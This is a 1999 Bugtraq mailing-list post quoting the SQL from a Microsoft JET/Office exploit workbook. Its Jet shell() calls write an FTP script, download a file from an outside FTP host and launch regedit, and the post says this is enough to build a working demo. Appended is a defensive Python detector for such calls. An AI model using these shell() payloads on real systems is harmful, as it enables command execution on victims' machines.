Bugtraq mailing list archives

Microsoft JET/Office Vulnerability Exploit


From: ollie () DELPHISPLC COM (Ollie Whitehouse)
Date: Thu, 19 Aug 1999 12:27:01 +0100


All,

Russ Cooper:
Well, with the module password protected it seems clear you're not out
to get that critique very quickly. Maybe if you'd let someone know the
details we'd be able to answer you. As it is, we're simply left with
what appears to be the same exploit.

Below is the code from the workbook:

[Code]
SELECT shell('command.com /C echo user anonymous
yeah () right com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit  >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys

[RAW Dump from the workbook from the SF web site]
SELECT shell('command.com /C echo user anonymous
yeah () right com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit  >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt;
*.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC
ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction
s=0;Threads=3;UID=admin;UserCommitSync=Yes

That will be enough information for people who want to create their own
working demo.

Ollie
<%
Ollie Whitehouse
I.T Co-Ordinator - Delphis Consulting
VOX: +44 (0)207 916 0200 (Switchboard)
FAX: +44 (0)207 916 1620 (Main)
FAX: +44 (0)870 0881837 (FAX - E-Mail)
PGP: http://www.ombs.demon.co.uk/pgp.txt
Tag: Who needs Windows2000 when you have OS/2?
%>
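Added here as a defender-side example, not code from the post or the workbook: a small Python checker that flags Jet shell(...) calls in query text recovered from a document or an ODBC trace and renders the command line each call would hand to the OS. The sample query is constructed to mirror the one quoted above, with placeholder host and file names; the function names are my own.

```python
import re

# Constructed sample in the shape of the query quoted above: three Jet shell()
# calls selected "FROM config.sys". Host and file names are placeholders.
SAMPLE_QUERY = (
    "SELECT shell('command.com /C echo user anonymous'+chr$(10)+'quit > c:\\script.txt'), "
    "shell('command.com /C ftp -s:c:\\script.txt -n ftp.example.com',1), "
    "shell('command.com /C regedit',1) FROM config.sys"
)

_SHELL_OPEN = re.compile(r"shell\s*\(", re.IGNORECASE)
_LITERAL_OR_CHR = re.compile(r"'((?:[^']|'')*)'|chr\$?\((\d+)\)", re.IGNORECASE)

def _argument_text(sql, open_paren):
    """Text between sql[open_paren] == '(' and its matching ')', skipping parens in literals."""
    depth, in_string = 0, False
    for i in range(open_paren, len(sql)):
        ch = sql[i]
        if ch == "'":
            in_string = not in_string   # a doubled quote toggles twice: still inside
        elif in_string:
            continue
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return sql[open_paren + 1:i]
    return sql[open_paren + 1:]         # unterminated call: take what is there

def find_jet_shell_calls(sql):
    """Argument text of each shell(...) call outside a literal, so 'shell(x)' in data is not flagged."""
    calls, i, in_string = [], 0, False
    while i < len(sql):
        if sql[i] == "'":
            in_string = not in_string
        elif not in_string and (i == 0 or not (sql[i - 1].isalnum() or sql[i - 1] == "_")):
            m = _SHELL_OPEN.match(sql, i)
            if m:
                arg = _argument_text(sql, m.end() - 1)
                calls.append(arg.strip())
                i = m.end() + len(arg) + 1  # resume after the closing ')'
                continue
        i += 1
    return calls

def render_jet_expression(expr):
    """Join the literals and chr$(n) pieces into the command line shell() would run."""
    return "".join(chr(int(code)) if code else lit.replace("''", "'")
                   for lit, code in _LITERAL_OR_CHR.findall(expr))
```

Run find_jet_shell_calls over any SQL text extracted from an Office document or an ODBC query log; a non-empty result is the indicator, and render_jet_expression shows what each call would execute.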
